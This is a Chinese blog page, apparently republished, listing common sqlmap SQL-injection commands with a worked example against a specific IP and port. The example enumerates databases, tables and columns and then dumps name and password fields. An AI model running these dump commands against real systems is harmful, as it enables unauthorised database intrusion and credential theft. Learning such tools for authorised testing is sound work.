当前位置:网站首页>sqlmap注入教程 常用指令
sqlmap注入教程 常用指令
2022-07-31 05:10:00 【不习惯有你】
sqlmap 官网:sqlmap: automatic SQL injection and database takeover tool
sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh 帮助手册 详细重点部分
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current-db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息最好在指令后面加 --level 3 --risk2,可以提升扫描时的深度于速率
--delay=1 指的是一秒钟发一个包
例如:
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” --dbs //爆库
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup --tables //爆表
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns 爆列
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member -C name,password --dump 爆字段值
尊重原创:
装载于:https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
- Distributed transaction processing solution big PK!
- [Introduction to MySQL 8 to Mastery] Basics - silent installation of MySQL on Linux system, cross-version upgrade
- 数据库上机实验3 连接查询和分组查询
- 02 【el和data的两种写法 MVVM模型】
- 实验7 UDP与TCP对比
- 解决响应式数据依赖响应式数据无响应问题
- Interviewer, don't ask me to shake hands three times and wave four times again
- Redis管道技术/分区
- 剑指offer基础版 ----- 第28天
- 剑指offer基础版--- 第23天
猜你喜欢
随机推荐
torch.normal function usage
Object Detection Study Notes
10 【高度塌陷与BFC】
Flask-based three-party login process
闭包(四)----IIFE
Redis 事务学习有感
uni-app进阶之生命周期【day8】
字符串的扩展
Swordsman Offer Special Assault Edition --- Day 3
Interviewer: If the order is not paid within 30 minutes, it will be automatically canceled. How to do this?
数据库上机实验4 数据更新和视图
Element concatenation operations in numpy and pytorch: stack, concatenat, cat
wpf wrapPanel居中并从左到右排列
07 【内置指令 自定义指令】
【JS面试题】面试官:“[1,2,3].map(parseInt)“ 输出结果是什么?答上来就算你通过面试
gin框架学习-GORM框架进阶之CRUD接口(数据库增删改查操作)
剑指offer基础版 ---- 第26天
联盟链的真实场景在哪里
【C语言3个基本结构详解——顺序、选择、循环】
实验8 DNS解析